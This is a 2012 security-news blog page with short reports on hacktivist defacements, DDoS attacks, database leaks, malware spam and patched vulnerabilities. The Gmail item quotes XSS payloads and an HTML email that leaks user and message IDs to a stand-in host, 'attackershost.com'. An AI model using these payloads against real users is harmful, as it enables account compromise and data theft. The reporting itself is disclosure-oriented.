Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

VoxAnon
Anonymous Hackers Breaking News VoxAnon

VoxAnon IRC Network suffers DDOS Attack

The VoxAnon, an IRC Community created as a platform to help facilitate inter-Anonymous discussion and activities , has experienced distributed denial of service(DDOS) attack.

“VoxAnon will be back soon! Check this page frequently for updates!” a message posted in the The main page of VoxAnon.org.


“#VoxAnon is down due to #DDOS Haters will hate. We won't stop doing what we do best,” a tweet posted on June 10 from VoxAnon IRC .




According to a report from HOTforSecurity, the DDOS attack may have been launched by other hacktivists who name VoxAnon a platform on which security companies and law enforcement look around.



Read more »
Vulnerability
Featured OS Vulnerability Vulnerability

64-bit OS & virtualization software running on Intel CPU vulnerable to local privilege escalation


A critical security vulnerability has been discovered in the 64 bit operating system and virtualization software running on Intel CPU , which leads to privilege Escalation exploit or a guest-to-host virtual machine escape.

The problem affects 64-bit versions of Windows, Linux, FreeBSD and the Xen hypervisor. The flaw seems to only affect Intel hardware – AMDand ARM CPUs are not affected.

"A ring3 attacker may be able to specifically craft a stack frame to be executed by ring0 (kernel) after a general protection exception (#GP)."US-CERT's vulnerability report reads.

" The fault will be handled before the stack switch, which means the exception handler will be run at ring0 with an attacker's chosen RSP causing a privilege escalation. "

Metasploit penetration testing framework founder H.D. Moore characterized the bug as a "serious guest-to-host escape vulnerability," noting that while it affects the Xen platform, it doesn't affect VMware.

To this end, operating system specific details on the vulnerability have been published by Xen, FreeBSD and Microsoft. Linux vendor Red Hat has also published two updates on the problem: RHSA-2012:0720-1 and RHSA-2012:0721-1.

To close the security hole, users should apply updates from their operating system supplier.
Read more »
XSS Vulnerability
Breaking News Vulnerability Web Application Vulnerability XSS Vulnerability

Google patched Persistent XSS vulnerabilities in Gmail


A security Researcher Nils Junemann discovered persistent cross-site scripting (XSS) vulnerabilities in Gmail and notified Google before few moths, Google patched the vulnerabilities now.

According to his blog post, Junemann found three different XSS vulnerabilities in Gmail. The first security flaw is "Persistent DOM XSS (innerHTML) in Gmail's mobile view" :

A incoming mail containing <img src=x onerror=prompt(1)> within the subject and forwarded to another user, has lead to XSS.

The second one is very simple non-persistent XSS in Gmail's mobile view:
https://mail.google.com/mail/ mu/#cv/search/%22%3E%3Cimg% 20src%3Dx%20onerror%3Dalert(2) %3E/foobar

The third security issue is very intersting persistent XSS. He discovered that there was a way for an attacker to get access to several key pieces of information in the URLs that Gmail generates when it displays a message to a user.

When a message is displayed directly, rather than as part of a user's inbox, it contains both a static user ID and an identifier for the individual message. Those values shouldn't be available to an attacker, but Juenemann found that he could get them through referrer leaks.

"An attacker doesn't know the ik and the message id . Without both values it's not possible to generate the special URL. But it's easy to get both values through referer leaking.

We have to send to our victim a HTML e-mail with that content:
<img src=" https://attackershost.com/1x1.gif " >
<a href=" https://attackershost.com/gmailxss ">Click here to have fun</a>
<script>alert(/xss/)</script>
When the user opens the email message, the GIF image will send the user ID and message ID to theattacker's server. The second URL also will leak that data if the user clicks on it. The script will then display a Javascript alert, and that's the attacker's code runningin the context of Gmail.
Read more »
Team GhostShell
Team GhostShell

#ProjectWestWind : Team GhostShell hacked Italian Government Sites

A Hacker known as Echelon, leader of Team GhostShell, launched a new campaign called ProjectWestWind, an operation aimed at “extreme-right nationalism and racism” in politics.


“As some of you may know (although not nearly as many as it should be), Europe has these past few years been hit by waves of extreme-right nationalism and racism in its political sphere. This includes nationalist political parties like Hungary's ‘Jobbik’, Italy's ‘Lega Nord’ and Finland’s ‘True Finns’,” Echelon said.

“The parties thrive on ignorance and disappointment, and have risen towards power on the wave that was the 2008 economic crisis - just as the NSDAP did during the 30s.”

The first victims of ProjectWestWind, which targets European governments, are a number of state-owned sites from Italy.

One of the targets is the Comune di San Marzano (sanmarzano-ta.gov.it), the site of which has been defaced to display the hackers’ message. Besides altering the website’s main page, Team GhostShell has also leaked more than 100 usernames and password hashes, including the ones of the administrator.

Another target is IV Circolo C.N.Cesaro (cncesaro.gov.it) from which the hackers have leaked 41 record sets comprising usernames, email addresses, names and password hashes.

primocircolovico.gov.it has been taken offline after the group has gained access to their databases, publishing 22 login details and 68 entries from a table named “docent.”

Names, usernames, passwords and email addresses have been also stolen from donmilaninapoli.gov.it, istitutodenicola.gov.it, cavaprimocircolo.gov.it and itimarconi.gov.it, all of them being taken offline.

The Italian government sites haven’t been the only victims of the first phase of ProjectWestWind. The website of the Swedish Vänsterpartiet political party (vansterpartiet.eu) and the one of the Council of Bars and Law Societies of Europe (ccbe.eu) have also been breached. From each of their databases the hackers have made available a handful of login details.
Read more »
Spam Report
BlackHole Exploit Spam Report

Amazon spam email leads to Blackhole Exploit kit website


Fake amazon notification mails are hitting inboxes and trying to lure recipients into following the links that hosts Blackhole Exploit kit . The email has been spotted by GFI researchers.

The mail may look legitimate . The only thing that gives it away at first glance is the fact that multiple email addresses are included in the "To:" field, and the email is personalized for the first recipient.

The links in the email leads to various legitimate but compromised WordPress domains. Their URLs contain the following section in their syntax:

/wp-content/themes/twentyten/zone(dot)html

Blackhole exploit code tries to exploit the Adobe Reader &Flash , Java vulnerabilities. If you have one of the vulnerable application installed in your system, then the kit will exploit the vulnerability and infects users system.

Read more »
Database Leaked
Database Leaked

Intruders break into University of North Florida

The University of North Florida(UNF) has started to sending out email notification to users after they have learned that database containing information about people who submitted contracts to live in the UNF residence halls could have been compromised.

UNF has now secured the servers, but an investigation shows the information could have been accessed as early as spring 2011.  The hacker may compromised the sensitive data includes approximately 23,000 names and Social Security numbers of people who submitted a housing contract between 1997 and spring 2011.

The institution has also made available a frequently asked questions (FAQ) page to offer further clarifications on the incident.

To help the potential victims, UNF is covering the cost of an identity protection service for a period of one year includes Credit report,Daily 3 Bureau Credit Monitoring,Identity Theft Resolution,ExtendCARE and $1 Million Identity Theft Insurance.

Read more »
Spam Report
Spam Report

"Hello Dear" a DHL notification mail leads malware infection



Epic Failed: A mail that purportedly coming from DHL informs that user delivery Processing complete successfully.  The truth is that the mail is not coming from DHL. If you look into the starting word of the mail, you can easily identify it. The mail starts with "Hello Dear". 

The Spam mail :

Hello Dear,

DHL Express Tracking Notification: Mon, 11 Jun 2012 12:14:55 +0200

Custom Reference: 9057425-HRIEI2E4Q8C
Tracking Number: UT09-2041042911
Pickup Date: Mon, 11 Jun 2012 12:14:55 +0200
Service: AIR/GROUND
Pieces: 2

Mon, 11 Jun 2012 12:14:55 +0200 - Processing complete successfully
PLEASE REFER TO ATTACHED FILE FOR DETAILED INFORMATION.

Shipment status may also be obtained from our Internet site in USA under http://track.dhl-usa.com or Globally under http://www.dhl.com/track

Please do not reply to this email. This is an automated application used only for sending proactive notifications

Thanks in advance,
DHL Express International Inc.

The mail has a zip file attachment which contains malware.Sophos products detect the Windows malware as Troj/Agent-WMO. The attached filename can vary, but takes the form DHL_International_Delivery_Details-[random code].zip.

A typical email has a subject line of "DHL Express Parcel Tracking notification [random code]" or "DHL Express Tracking Notification ID [random code]" or "DHL International Notification for shipment [random code]"

Read more »
Defaced Website
Defaced Website

Karachi News website hacked by nyro hacker and Army Of Destruction

A Hacker called as Nyro Hacker break into the Pakistan's Premier News Web Portal , The Karachi News (karachinews.com.pk).  Hacker defaced the website.

At the time of writing this article, the website displays an "under construction message" in the main page.

The mirror of the defacement is available at the zone-h:
http://arab-zone.net/mirror/107910/karachinews.com.pk/

Read more »
PrivateX
Anonymous Philippines Breaking News Defaced Website PrivateX

7 Philippines Govt. Sites hacked to protest against anti-hacking bill


The Hacker group called as "PrivateX",a coalition of local hacker groups HukbalaHack,Anonymous, PrivateX and Philkers, hacked Seven Philippines Government websites on Independence Day as a form of protest against new anti-cybercrime bill.

According to GMA News,The websites affected are the City Government of Mandaluyong's website (mandaluyong.gov.ph), the website of the Office of the Ombudsman (omb.gov.ph), the Philippine Anti-Piracy Team website (papt.org.ph).

Philippine Nuclear Research Institute website (pnri.dost.gov.ph), the National Food Authority website (nfa.gov.ph), the Senate Electoral Tribunal website (set.gov.ph), and a Department of Health website (smokefree.gov.ph) have also been breached.

Whenever user access above mentioned websites, the are redirected to a another page that has the defacement message of PrivateX.

The hacktivists fear that in its current form, the bill could be used as “a tool of censorship” which could pose a threat to freedom of expression.

"We're not against the government's intention to combat fraudulence, related forms of it and other serious cyber crimes, but we're absolutely against its provision that has something to do with the internet's freedom of expression (sic)," Hacker said in the defacement page.
Read more »
Defaced Website
Breaking News Defaced Website

OpenVPN official site hacked by HCJ


The official website of OpenVPN has been defaced by hackers apparently led by HcJ. OpenVPN is an open source software application that implements virtual private network (VPN) techniques for creating secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities.

Hackers didn't mention the reason for the attack but the wrote the following message in the defacement page "No News Is a Good News "along with a “quote of the day” that read:

Don’t be lammer, Leave your computer and enjoy your summer ./ HcJ"

At the press time, the Website OpenVPN.com has been restored and back to online. The mirror of the defacement is available at Zone-H.

It’s uncertain at this time if the hackers have gained access to information stored in the website’s databases.
Read more »
Zer0Pwn
Hackers News Zer0Pwn

The official website of the State of Louisiana hacked by Zer0Pwn

The Hacker known as Zer0Pwn have managed to gain unauthorized access to the official website of the State of Louisiana(Louisiana.gov).

Hacker dumped the compromised database in pastebin. The dump includes emails, passwords, root users, and administrator credentials.

http://pastebin.com/Ubg8GnKG

He also claimed that he found xss vulnerability in SubjectPlus, a web-application software used by mostly educational websites. He posted the proof-of-concept in pastebin.
Read more »
Subscribe to: Comments (Atom)